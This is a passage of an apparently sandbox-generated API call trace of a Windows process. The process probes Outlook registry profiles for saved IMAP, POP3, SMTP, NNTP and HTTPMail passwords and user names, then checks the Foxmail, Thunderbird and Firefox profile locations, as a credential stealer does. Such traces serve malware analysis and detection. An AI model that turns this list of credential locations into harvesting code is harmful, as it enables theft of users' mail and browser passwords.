hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.886] RegQueryValueExW (in: hKey=0x480, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.886] RegCloseKey (hKey=0x480) returned 0x0 [0236.886] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.886] RegQueryValueExW (in: hKey=0x480, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.886] RegCloseKey (hKey=0x480) returned 0x0 [0236.886] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.886] RegQueryValueExW (in: hKey=0x480, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.886] RegCloseKey (hKey=0x480) returned 0x0 [0236.886] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x480) returned 0x0 [0236.886] RegQueryValueExW (in: hKey=0x480, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.886] RegCloseKey (hKey=0x480) returned 0x0 [0236.887] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c1c8 | out: phkResult=0x615c1c8*=0x480) returned 0x0 [0236.887] RegQueryInfoKeyW (in: hKey=0x480, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c1f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c1f8*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.887] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x0) returned 0x2 [0236.887] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x615c144, lpdwDisposition=0x615c1cc | out: phkResult=0x615c144*=0x4a8, lpdwDisposition=0x615c1cc*=0x1) returned 0x0 [0236.888] RegQueryValueExW (in: hKey=0x4a8, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.888] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.888] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.888] RegQueryValueExW (in: hKey=0x4a8, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.888] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.888] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.888] RegQueryValueExW (in: hKey=0x4a8, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.888] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.888] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.888] RegQueryValueExW (in: hKey=0x4a8, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.888] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.888] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.888] RegQueryValueExW (in: hKey=0x4a8, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.889] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.889] RegQueryValueExW (in: hKey=0x4a8, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.889] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.889] RegQueryValueExW (in: hKey=0x4a8, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.889] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.889] RegQueryValueExW (in: hKey=0x4a8, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.889] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.889] RegQueryValueExW (in: hKey=0x4a8, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.889] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.890] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.890] RegQueryValueExW (in: hKey=0x4a8, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.890] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.890] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.890] RegQueryValueExW (in: hKey=0x4a8, lpValueName="Email", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.890] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.890] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.890] RegQueryValueExW (in: hKey=0x4a8, lpValueName="HTTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.890] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.890] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.890] RegQueryValueExW (in: hKey=0x4a8, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.890] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.891] RegQueryValueExW (in: hKey=0x4a8, lpValueName="POP3 User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.891] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.891] RegQueryValueExW (in: hKey=0x4a8, lpValueName="IMAP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.891] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.891] RegQueryValueExW (in: hKey=0x4a8, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.891] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.891] RegQueryValueExW (in: hKey=0x4a8, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.891] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.892] RegQueryValueExW (in: hKey=0x4a8, lpValueName="SMTP User", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.892] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.892] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.892] RegQueryValueExW (in: hKey=0x4a8, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.892] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.892] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.892] RegQueryValueExW (in: hKey=0x4a8, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.892] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.892] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.892] RegQueryValueExW (in: hKey=0x4a8, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.892] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.892] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.892] RegQueryValueExW (in: hKey=0x4a8, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.893] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.893] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.893] RegQueryValueExW (in: hKey=0x4a8, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.893] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.893] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.893] RegQueryValueExW (in: hKey=0x4a8, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.893] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.893] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.893] RegQueryValueExW (in: hKey=0x4a8, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.893] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.893] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.893] RegQueryValueExW (in: hKey=0x4a8, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.893] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.894] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.894] RegQueryValueExW (in: hKey=0x4a8, lpValueName="HTTPMail Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.894] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.894] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x2001f, phkResult=0x615c148 | out: phkResult=0x615c148*=0x4a8) returned 0x0 [0236.894] RegQueryValueExW (in: hKey=0x4a8, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x615c1bc, lpData=0x0, lpcbData=0x615c1b8*=0x0 | out: lpType=0x615c1bc*=0x0, lpData=0x0, lpcbData=0x615c1b8*=0x0) returned 0x2 [0236.894] RegCloseKey (hKey=0x4a8) returned 0x0 [0236.894] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c1c8 | out: phkResult=0x615c1c8*=0x4a8) returned 0x0 [0236.894] RegQueryInfoKeyW (in: hKey=0x4a8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x615c1f8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x615c1f8*=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x615c1f4*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0236.917] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Classes\\Foxmail.url.mailto\\Shell\\open\\command", ulOptions=0x0, samDesired=0x20019, phkResult=0x615c208 | out: phkResult=0x615c208*=0x0) returned 0x2 [0236.951] CoTaskMemAlloc (cb=0x20c) returned 0x79baf8 [0236.951] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79baf8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0236.951] CoTaskMemFree (pv=0x79baf8) [0236.951] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615bcac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0236.951] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Thunderbird\\Profiles", nBufferLength=0x105, lpBuffer=0x615bd34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Thunderbird\\Profiles", lpFilePart=0x0) returned 0x36 [0236.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c190) returned 1 [0236.951] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Thunderbird\\Profiles" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\thunderbird\\profiles"), fInfoLevelId=0x0, lpFileInformation=0x615c20c | out: lpFileInformation=0x615c20c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0236.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c18c) returned 1 [0236.982] CoTaskMemAlloc (cb=0x20c) returned 0x79baf8 [0236.982] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79baf8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0236.982] CoTaskMemFree (pv=0x79baf8) [0236.983] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x615bcac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpFilePart=0x0) returned 0x21 [0236.983] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", nBufferLength=0x105, lpBuffer=0x615bd38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpFilePart=0x0) returned 0x3a [0236.983] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c194) returned 1 [0236.983] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles"), fInfoLevelId=0x0, lpFileInformation=0x615c210 | out: lpFileInformation=0x615c210*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3cfa0c70, ftCreationTime.dwHighDateTime=0x1d2f18b, ftLastAccessTime.dwLowDateTime=0x3cfa0c70, ftLastAccessTime.dwHighDateTime=0x1d2f18b, ftLastWriteTime.dwLowDateTime=0x3cfa0c70, ftLastWriteTime.dwHighDateTime=0x1d2f18b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0236.985] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x615c190) returned 1 [0237.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x615c1b0) returned 1 [0237.046] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", nBufferLength=0x105, lpBuffer=0x615bcb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpFilePart=0x0) returned 0x3a [0237.047] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", nBufferLength=0x105, lpBuffer=0x615bc8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpFilePart=0x0) returned 0x3b [0237.047] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x615bed8 | out: lpFindFileData=0x615bed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3cfa0c70, ftCreationTime.dwHighDateTime=0x1d2f18b, ftLastAccessTime.dwLowDateTime=0x3cfa0c70, ftLastAccessTime.dwHighDateTime=0x1d2f18b, ftLastWriteTime.dwLowDateTime=0x3cfa0c70, ftLastWriteTime.dwHighDateTime=0x1d2f18b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7dcb38 [0237.048] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bee8 | out: lpFindFileData=0x615bee8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3cfa0c70, ftCreationTime.dwHighDateTime=0x1d2f18b, ftLastAccessTime.dwLowDateTime=0x3cfa0c70, ftLastAccessTime.dwHighDateTime=0x1d2f18b, ftLastWriteTime.dwLowDateTime=0x3cfa0c70, ftLastWriteTime.dwHighDateTime=0x1d2f18b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.048] FindNextFileW (in: hFindFile=0x7dcb38, lpFindFileData=0x615bee8 | out: lpFindFileData=0x615bee8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3cfa0c70, ftCreationTime.dwHighDateTime=0x1d2f18b, ftLastAccessTime.dwLowDateTime=0xf4500380, ftLastAccessTime.dwHighDateTime=0x1d30616, ftLastWriteTime.dwLowDateTime=0xf4500380, ftLastWriteTime.dwHighDateTime=0x1d30616, 